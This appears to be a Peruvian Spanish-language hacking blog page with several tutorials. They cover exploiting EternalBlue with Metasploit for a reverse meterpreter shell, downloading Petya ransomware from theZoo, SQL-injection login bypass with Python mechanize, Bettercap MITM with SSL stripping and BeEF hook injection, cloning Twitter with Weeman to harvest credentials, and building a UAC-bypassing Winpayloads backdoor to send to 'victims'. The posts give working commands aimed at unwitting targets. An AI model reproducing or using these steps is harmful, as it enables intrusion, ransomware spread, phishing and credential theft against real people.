sábado, 31 de diciembre de 2016

MS17-010 EternalBlue - Remote Hacked Windows 7/8 64BITS Metasploit



Saludos mis queridos fieles lectores, luego de ver algunos mensajes de nuestros seguidores respecto al Exploit MS17-010 EternalBlue.

Si bien es cierto este Exploit fue publicado gracias a una fuga de información - "Leak".
Afecto a muchas empresas a nivel mundial aprovechando la vulnerabilidad SMB  en el puerto 445 para ejecutar códigos maliciosos remotamente, efectuando ataques APT'S mundiales como el ransomware "Wannacry" y "Petya"

En el anterior POST enseñe como puedes ejecutar este ransomware en el sistema de tu victima:
https://www.backtrackomar.com/2017/09/generando-payloads-con-chaos-framework.html

¿Como funciona Eternalblue?

EternalBlue aprovecha una vulnerabilidad en la implementación del protocolo Server Message Block (SMB) de Microsoft. Esta vulnerabilidad, denotada como CVE-2017-0144 en el catálogo Common Vulnerabilities and Exposures (CVE), se debe a que la versión 1 del servidor SMB (SMBv1) acepta en varias versiones de Microsoft Windows paquetes específicos de atacantes remotos, permitiéndoles ejecutar código en el ordenador en cuestión.

Referencia: https://es.wikipedia.org/wiki/EternalBlue

Comencemos 

El exploit se encuentra en los repertorios de msfconsole instalado, si no lo tienes actualizalo.

root@kali:/# apt update && apt upgrade && apt dist-upgrade 

Otra alternativa:

root@kali:/# msfupdate

Bueno lo primero que debes hacer tu como "Analizador" en un entorno real "Abrir los puertos de tu Router" o elaborarlo desde un VPS (Por su seguridad de identidad si el caso lo a merita)

En primer instancia haremos un escaneo en mi red local para encontrar los dispositivos conectados:

Nmap - Mapeando redes y verificando que puertos tienen abiertos:

root@kali:/# nmap 192.168.1.1/24 -O sU -sT


POST: https://www.backtrackomar.com/2014/04/aprendiendo-nmap-nivel-basico.html

Nuestro objetivo tiene el puerto 445 y por lo que nos indica Nmap corre Windows 7 por la cantidad de repeticiones.

Vamos a utilizar el script " de análisis vulnerabilidades de nmap para testear si es vulnerable.

root@kali:/# nmap --script smb-vuln-ms17-010.nse -p445  192.168.1.3

Genial, a continuación ejecutaremos msfconsole para la explotación remota, pero antes activen el servidor de base de datos.

root@kali:/# service postgresql start
root@kali:/# msfconsole 


Source:
-------------------------------------------------------------------------------------------------------------------------
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.33
lhost => 192.168.1.33

msf exploit(ms17_010_eternalblue) > exploit
--------------------------------------------------------------------------------------------------------------------------

Luego que se ejecute el código malicioso remotamente, hemos tenido la sesión meterpreter de nuestra victima:

El sistema esta completamente comprometido,  si deseas interactuar el S.O de la victima te dejo un articulo de hace años. se que te ayudara.


! Saludos !


domingo, 18 de diciembre de 2016

theZoo - Proyecto de análisis de Malware

Saludos mis queridos fieles lectores, en esta oportunidad les traigo TheZoo es un proyecto con muchos años de elaboración con el único fin de analizar los Malwares mas peligrosos y conocidos a nivel mundial.

Entre ellos tenemos: Wannacry, Petya, TeslaCrypt, Stuxnet, Zeus en casi todas sus versiones , Rat's, SpyEye entre muchos.

Binarios:





https://github.com/ytisf/theZoo/tree/master/malwares/Binaries

Común mente un analizador de malware mediante depuradores de código ensamblador como Ollydbg entre otros. ( Descompila un binario y puede ver los procesos y acciones  que se ejecutan en cada evento)

Payload camuflado en Raidcall.exe



theZoo también nos proporciona Malwares con sus respectivos códigos abiertos.

Códigos:




https://github.com/ytisf/theZoo/tree/master/malwares/Source/Original

Lo mas asombroso son los "Exploitkit" que en su momento valieron mucho dinero. entre ellos el rescata ble BlackHole


Una colección que sin duda es muy beneficiosa para los amantes de análisis de malware, pero  toda acción tiene reacción.

Por ejemplo subir los ransomware que son bastante perjudiciales en los ordenadores de las victimas ya sea por ataques remotos, Post-explotación o simplemente de manera manual en entornos físicos.
como por ejemplo el "Wannacry" o el "Petya"



Este servidor ha enseñado en artículos anteriores como ejecutar malware de manera remota por medio de RAT, Msfconsole o frameworks nuevos como Empire, pupy, chaos entre otros, que puedes encontrar en este humilde blog.

https://www.backtrackomar.com/search?q=metasploit
https://www.backtrackomar.com/search?q=framework


Bueno descargamos los repositorios e instalamos los requisitos correspondientes:

root@kali:~# git clone https://github.com/ytisf/theZoo/

root@kali:~# cd theZoo/
root@kali:~/theZoo# pip install -r requirements.txt 

Luego daremos permisos al aplicativo y lo ejecutaremos:

root@kali:~/theZoo# chmod +x theZoo.py 
root@kali:~/theZoo# python theZoo.py 

Podemos observar que nos sale un mensaje de alerta respecto a la peligrosidad de los archivos. nosotros le daremos Yes.




El entorno es bastante flexible para interactuar (Framework) comencemos.
vamos interactuando con comandos.

mdb #> help

 Available commands:

search              Search for malwares according to a filter, e.g 'search cpp worm'.
list all             Lists all available modules
use                 Selects a malware by ID
info                 Retreives information about malware
get                 Downloads selected malware
report-mal   Report a malware you found
update-db   Updates the databse
help                 Displays this help...
exit                 Exits...

Luego de leer las respectivas opciones, vamos a buscar un ransomware conocido el "Petya":

mdb #> search petya

Nuestra búsqueda fue correcta, en carácter # es su (ID) identificador que nos permite usarlo:

mdb #> use 165

Ahora utilizaremos get para descargar el binario & source.


mdb Petrwrap#> get

Hemos descargado varios archivos en la carpeta de raiz, el que nos interesa esta en formato ZIP (Donde se encuentra el binario)

Lo extraemos:

root@kali:~/theZoo# ls
root@kali:~/theZoo# unzip Ransomware.Petrwrap.zip 

Postdata: La contraseña de todos los archivos es: infected

Tú eres el ubico responsable: solo acuérdate algo "Toda acción, tiene su reacción."

Saludos y éxitos mi fiel lector, un fuerte abrazo desde Perú. 

martes, 13 de diciembre de 2016

Hacking con Python - Interactuando con servidores web


 


Saludos mis queridos fieles lectores bueno en esta oportunidad deseo aclarar lo siguiente hace mas de 1 año estuve aprendiendo Python pero lamentablemente deje de estudiar ese lenguaje por motivos personales, hace 2 semanas llevo aprendiendo nuevamente las bases y todo lo demás.

Cabe de decir que en todos mis aprendizajes que emplee en mi conocimiento, serán expuestos en el blog para compartir con ustedes mi mejoramiento.

Si deseas aprender python y dar tus primeros pasos en este lenguaje sencillo pero a la vez muy potente, dejare un post que realice hace mucho tiempo.

http://www.backtrack-omar.com/2015/02/aprendiendo-python-nivel-basico-parte-1.html


¿Qué es Python?

Python es un lenguaje de alto nivel  orientado a objetos, La sintaxis de python   es muy limpia, su código es muy legible y es muy fácil de entenderlo.
Antes de comenzar por favor trata de leer el anterior POST.

Este escenario lo haremos desde el sistema operativo Kali linux - Debian, que por defecto lo tiene instalado, si utilizas un sistema Linux desde 0 puedes utilizar APT para instalarlo desde la terminal.

root@kali:~# apt-get install python

Algo que debo mencionar, es que trabajemos con la versión 2.7.X.

Descarga:

 Windows: https://www.python.org/downloads/windows/
 Mac  OShttps://www.python.org/downloads/mac-osx/


Después de tener instalado Python puedes ejecutarlo por la misma terminal:

Cambien puedes utilizar un IDE yo recomiendo Ninja-IDE, lo pueden descargar de su pagina oficial:

http://ninja-ide.org/downloads/

En mi caso tengo que descargar la versión debian en formado .deb, para poder instalarlo.
 
root@kali:~/Downloads# dpkg -i ninja-ide_2.3+r597~saucy1_all.deb 



También puedes instalar Sublime-Text para este escenario, para escribir código y activar su opción Build para poder ejecutar lo que estas programando, pero por mi parte no lo recomiendo, es mejor ejecutarlo por Ninja-IDE O por la terminal el archivo:  python ejemplo.py 

Vamos a utilizar algunas librerías dedicadas al manejo de plataformas web, empecemos.


Mechanize:

Es una librería que nos permite interactuar con cualquier plataforma web, como si estuviéramos en un navegador gráfico, ya que manipularemos los envíos de las peticiones en cualquier tipo de instancia.

Mechanize tiene 2 componentes principales:

Browser   -  Nos permite interactuar de manera completa a cualquier servidor web.

Controles - Nos permiten interactuar con  la informacion  de un servicio en su mayoría de codificación html. 


En esta prueba de concepto vamos a elaborar las peticiones desde mi servidor que esta alojado en una maquina virtual corriendo en XAMPP, ustedes pueden observar que la plataforma es "DVWA".

Bien lo que primero haremos, sera añadir la librería en nuestro proyecto de la siguiente manera:

import mechanize

si no  tienes esta librería no te preocupes, puedes instalarla de esta manera desde tu terminal:

pip install mechanize

luego crearemos nuestros objetos para definir nuestras instancias, y empezar a enviar nuestra peticiones.



>>> import mechanize

Importamos nuestra librería mechanize.  

>>> brow = mechanize.Browser()


creamos una instancia del objeto Browser de mechanize, para poder hacer peticiones a los servidores http.

>>> respuesta = brow.open('http://192.168.1.46/DVWA/login.php')


luego de ello utilizamos la instancia open para poder interactuar con nuestro primer objeto llamado brow y establecer una petición con url http://192.168.1.46/DVWA/login.php'

>>> print respuesta.geturl()


Entonces nosotros queremos recibir la respuesta del servidor, por ello le daremos print en el objeto respuesta y añadiremos geturl que nos permitirá obtener la url del servidor.  

>>> print respuesta.info()


Nos permitirá poder recibir la respuesta de informacion del servidor.

Date: Mon, 21 Nov 2016 04:29:00 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38
X-Powered-By: PHP/5.5.38
Set-Cookie: PHPSESSID=0h5f5rqpo4a06hduh8e067lg16; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=0h5f5rqpo4a06hduh8e067lg16; path=/; httponly
Set-Cookie: security=impossible; httponly
Content-Length: 1567
Connection: close
Content-Type: text/html;charset=utf-8
Content-Type: text/html; charset=UTF-8
 


Si nosotros podemos ver este tipo de informacion de la versiones del servicios que  tiene, podemos ver que nos arroja como resultado:
 

Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.5.38

Fácilmente podemos buscar "Exploits", para poder elaborar un ataque remoto si lo vemos de esa perspectiva.
 
Bien continuemos con esto, si nosotros deseamos enviar peticiones a formularios, en este ejemplo buscaremos "vulnerabilidades SQLi metodo POST", para ello tengo el siguiente escenario.
  
Nuevamente añadiré mi instancia y todo los procesos para poder establecer una respuesta del servidor.  

>>> import mechanize
>>> br = mechanize.Browser()
>>> respuesta = br.open('http://192.168.1.46/sqlilabs/Less-42/')


Luego vamos a establecer una búsqueda de todos los formularios que contenga el modulo del login.

>>> for form in br.forms():
...     print form
... 


Vemos que nos arroja los siguientes formularios, en la linea 1 llamada login:

<login POST http://192.168.1.46/sqlilabs/Less-42/login.php application/x-www-form-urlencoded
  <TextControl(login_user=)>
  <PasswordControl(login_password=)>
  <SubmitControl(mysubmit=Login) (readonly)>>


comprobaremos si son los mismos formularios, desde el navegador web.

podemos observar que los formularios son los mismos, entonces no hay ningún problema.

Aclaremos los siguientes puntos, mechanize tiene la opción de poder manipular nuestros atributos y establecer los envíos de datos por su modulo submit.

Continuando con siguiente, debemos establecer que linea de formularios trabaremos, como solo existe el valor uno, de manera lógica se establece como 0, si existieran 2 y nuestro formulario estuviera de bajo del primero seria 1

>>> br.select_form(nr=0)


luego de añadir el numero del formulario que trabajaremos.
Vamos añadir los atributos a los respectivos formularios, en esta prueba hemos utilizado un conocido Bypass = ' or 1=1--

>>> br.form['login_user'] = "' or 1=1--"
>>> br.form['login_password'] = "' or 1=1--"


Entonces enviaremos nuestra petición al servidor de la siguiente manera.

>>> br.submit()


<response_seek_wrapper at 0xb73fd12cL whose wrapped object = <closeable_response at 0xb74030ecL whose fp = <socket._fileobject object at 0xb746ed6c>>>


Vemos que nos ha enviado una respuesta, ahora lo que debemos hacer por ultimo es leer la fuente de la pagina ver, para ver que respuesta nos ha arrojado.

>>> print br.response().read()



<html>
<head>
</head>
<body bgcolor="#000000">
<font size="3" color="#FFFF00">
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>

<font size="5" color= "#FFFF00">You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1</font><tr><td colspan="2" style="text-align:center;"><br/><p style="color:#FF0000;">
<center>
<img src="../images/slap1.jpg">
</center>
</p></td></tr>


Testing


Sencillo verdad, pero solo estamos estableciendo valores definidos por nosotros mismos, para poder entender Python desde esa perspectiva, para después crear nuestra propios herramientas y establezcan las funciones por si mismas.

Un consejo, si eres el master de una web trata de controlar y ver los registros de las conexiones entrantes.


Si en vez de establecer una petición para auditoria, deseamos entrar a un panel administrativo por medio de sus credenciales.

pues entraremos nuevamente en la plataforma DVWA

Pero como estaremos en un panel administrativo debemos definir nuestra Cookie, para poder establecer conexión persistente desde la terminal, para ello utilizaremos el modulo: cookielib 

>>> import mechanize
>>> import cookielib
>>> br = mechanize.Browser()


La libreria Cookielib sirve para poder establecer una Cookie, para establecer conexión de usuario sin perderla al momento de actualizar o retroceder. 

Luego de ello, hemos instanciado nuestro objetivo Cookiejar, para establecer su función con nuestro modulo mechanize.  

>>> cj = cookielib.LWPCookieJar()
>>> br.set_cookiejar(cj)


Aquí estamos diciendo que no utilizaremos buscada de robots.

>>> br.set_handle_robots(False)


Luego de ello, los que le comentaba si nosotros actualizamos la plataforma por la terminar o regresamos, se nos cerrara la sesión ya que no establecimos el proceso de disponibilidad. 

>>> br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)


se acuerdan que hace momentos mostré los registros de conexiones por XAMPP, en esta instancia nos permite poder modificar nuestros agentes de usuario, quiere decir que podemos hacernos pasar por una sistema MAC OS y simular que estamos navegando desde el navegador Opera.

>>> br.addheaders = [('User-agent', 'Opera/9.25 (Macintosh; PPC Mac OS X; U; en)')]


Entonces estableceremos la URL,que deseamos enviar peticiones.

>>> r = br.open('http://192.168.1.46/DVWA/login.php')


ahora haremos nuevamente una búsqueda de formularios. 


>>> for form in br.forms():
...    print form
... 


<POST http://192.168.1.46/DVWA/login.php application/x-www-form-urlencoded
  <TextControl(username=)>
  <PasswordControl(password=)>
  <SubmitControl(Login=Login) (readonly)>
  <HiddenControl(user_token=e8db4eb8dbfcad683b1ab919c61cb253) (readonly)>>


Si tu defines los atributos, sin especificar con que formulario desees trabajar, te saldrá error, por el simple hecho de no asignar el objeto. 

>>> br.form['username'] = 'admin'


Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'NoneType' object does not support item assignment


Entonces procederemos a elaborar dicha función correctamente asignando el valor 0, ya que en programación el valor inicial 1 es igual a 0

>>> br.select_form(nr=0)


Añadiremos nuestros atributos ( las credenciales reales )

>>> br.form['username'] = 'admin'
>>> br.form['password'] = 'password'


Enviaremos nuestro petición.
 
>>> br.submit()
<response_seek_wrapper at 0xb73d9a6cL whose wrapped object = <closeable_response at 0xb73f004cL whose fp = <socket._fileobject object at 0xb73ce9ac>>>


leeremos la respuesta del servidor por medio del código fuente.

>>> print br.response().read()



Comprobaremos si es el mismo código por medio del navegador gráfico.


Correcto, siempre cuando hagan consultas desde mechanize deben tener en claro que están interactuando como si fuese desde un navegador gráfico, pero desde la terminal.

ahora miremos los logs o registros del servidor apache para ver si nuestro agente de usuario que es Mozilla/Firefox  - Linux 32bits a cambiado a Opera - Mac OS

Espero les halla encantado este humilde articulo, me despido estaré estudiando mas métodos para poder continuar con este pequeño curso de Python.

Saludos!!!!



Framework Bettercap - MITM

Saludos mis fieles lectores en esta oportunidad aprenderemos a realizar un ataque MITM y manipular el trafico de paquetes burlando la seguridad SSL de algunas plataformas.

¿Que es Bettercap?

Es una herramienta potente, flexible y portátil creada para realizar varios tipos de ataques MITM contra una red, manipular HTTP, HTTPS y tráfico TCP en tiempo real, capturar las credenciales y mucho más.

Referencia:
https://www.bettercap.org

Instalación: 

Instalaremos la dependencias, librerías gems de ruby y instalaremos desde los repositorios oficiales de Kali Linux.

root@kali:~# sudo apt-get install build-essential ruby-dev libpcap-dev
root@kali:~# apt-get update
root@kali:~# apt-get install bettercap

Otro metodo de instalación es mediante gem:

root@kali:~# gem install bettercap

Si deseas actualizar a una versión nueva ejecutas lo siguiente:

root@kali:~# gem update bettercap

En algunas oportunidades si ejecutamos desde la terminal bettercap nos arrojaría un error, para repararlo lo recomendable es bajar el repositorio de Github y proceder manualmente:

root@kali:~#  git clone https://github.com/evilsocket/bettercap
root@kali:~# cd bettercap
root@kali:~# gem build bettercap.gemspec
root@kali:~# sudo gem install bettercap*.gem

Si persiste el error debe fijarse si tiene la ultima versión de Ruby y Bundle simplemente:

root@kali:~# apt-get upgrade && gem install bundler

Luego de configurar correctamente bettercap pasaremos a ejecutarlo:

root@kali:~# sudo bettercap --proxy -P POST

En escenario hemos elegido capturar todos los paquetes de los dispositivos que se conecten a nuestra red bypasseando el protocolo SSL/HSTS de los servidores web protegidos.

Victima:







Podemos observar que hemos capturado un correo hotmail.com, también podemos utilizar driftnet para ver las imágenes de las webs visitadas.

root@kali:~# driftnet -i wlan0  ( en mi caso estoy conectado desde Wi-Fi ) si usted esta desde un cable de red es "eth0"

 De igual manera pueden ejecutar un ataque de direccionamiento con un Payload o un JS de BeEF infectando a tu victima mediante su navegador.

root@kali:~# bettercap --proxy-module --js-url http://192.168.1.2:3100/hook.js

Si usted desea ejecutar un ataque dirigido a un HOST especifico puede ejecutar lo siguiente:

root@kali:~#  bettercap -T 192.168.1.4 --proxy -P POST

Si desea saber que dispositivos están conectados a su red puede realizar un mapeo de redes con nmap mediante su rango:

root@kali:~#  nmap -sS -v -O 192.168.1.1/24

POST BeEF: 
https://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html

POST Nmap:
https://www.backtrackomar.com/2014/04/aprendiendo-nmap-nivel-basico.html

! Saludos !, ahora si hasta mas tarde mi fiel lector son las 4:54 de la mañana acá en Perú y este servidor tiene sueño jaja.

miércoles, 7 de diciembre de 2016

Clonando plataformas web con Weeman

Saludos mis queridos fieles lectores en esta oportunidad les traigo un automatizador  para clonar plataformas web de manera rápida y sencilla.

¿Que es Weeman?

Es una herramienta desarrollada en Python para clonar cualquier sitio web y capturar los datos almacenados.
(Soporta HTTP & HTTPS)

Instalación:

root@kali:/# https://github.com/evait-security/weeman.git
root@kali:/# cd weeman

Requisitos: bs4

root@kali:/# pip install bs4

Ejecutando:

root@kali:/# cd weeman

weeman > set url https://twitter.com                                     (Sitio web que deseamos clonar)
weeman > set action_url https://twitter.com/login/error       (Redirección de la pagina)
weeman > set port 80                                                            (Puerto por defecto)
weeman > run

Si observamos nos sale que el puerto esta en USO, porque tengo el apache activado. ( de manera automatizada te establece el puerto de escucha)

weeman > set port 8080
weeman > run

Enviamos nuestra URLa nuestra victima ( claro con nuestra IP Lan o WAN )

Cuando nuestra victima ingrese sus credenciales correspondientes de manera automática lo redireccionara:

¿Muy creíble verdad?, ahora en segundo plano ustedes tendrán sus credenciales:





Creando tus Backdoors con Winpayloads

Saludos fieles lectores en esta oportunidad les traigo una herramienta llamada "WInPayloads" creada en python, su función principal es crear "Payloads" unicamente para la plataforma Windows, su uso es sencillo como un framework lo interesante de ello, es su constante actualización y las nuevas funciones que se añaden en cada repertorio.

Descarga:

root@kali:~/Winpayloads# git clone https://github.com/nccgroup/Winpayloads.git 

Luego de descargar su respectivo modulo, pasaremos a entrar a la carpeta e instalaremos los requisitos y dependencias necesarias.

root@kali:~/Winpayloads# ./setup.sh

Bueno ya instalado todo lo necesario, pasaremos a ejecutar el archivo.

lo peculiar de esta herramienta es que todo esta automatizado, cabe decir que es una herramienta para personas ocupadas como nosotros y deseemos optimizar los procesos.

en esta prueba de concepto escogeré la opción 2:

2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks] 

configurando nuestro payload

vemos que nos aparecen 2 lineas que nos pregunta que puerto de escucha y IP deseamos añadir, en si las opciones te llegan configuradas, pero si deseas añadir tu puerto de escucha puedes personalizarlo, como también añadir tu  IP publica para ataques fuera de la red (WAN) 
  
En mi caso escogí el puerto 8081 y deje mi IP por default para estatblecer nuestros datos de conexión en nuestro payload.   

Luego de configurar esos datos, nos aparecerá la penúltima linea:

[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y

No hay necesidad de explicar lo siguiente, porque esta bien claro, nos pregunta si deseamos utilizar un exploit Bypass UAC para obtener todos los privilegios, yo le añadí que si.

[*] Payload.exe Has Been Generated And Is Located Here: /etc/winpayloads/Windows_Meterpreter_Reverse_Shell.exe

El archivo se genero en la carpeta de raiz:  /etc/winpayloads

Para terminar nos aparece la siguiente linea:

Upload To Local Websever or (p)sexec? [y]/p/n: y
 

lo pregunta es, si deseamos crear un servidor web local de escucha para subir nuestro payloads y poder enviarlo a nuestro victima, yo le añadí si.

Serving Payload On http://192.168.1.35:8000/Windows_Meterpreter_Reverse_Shell.exe

Vemos que nos arrojo la ruta del payload corriendo, luego de ello se abrirá metasploit framework con nuestra configuración añadida:

Solo nos quedara enviar el payloads a nuestra victima pueden utilizar MITM, si estas en tu red local o cualquier otro medio, si no sabes como te invito a buscar en el blog los artículos mencionados.






Luego que nuestra victima ejecute el exploit: ojo ustedes pueden cambiarle el nombre, aclaro esto porque tengo un "critico" con micronocimientos que comenta a cada momento un post mio, jajaja.

Bueno en el momento que nuestra victima ejecute el payloads tendremos su sesión meterpreter 1, pero en segundo plano se estará ejecutando el modulo del Bypass UAC:

vemos que nuestro bypass se ejecuto correctamente, espero les halla gustado este pequeño articulo.

No olvides compartir el blog y dejar tu comentario.
Agradecer no cuesta nada.

Saludos!




Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares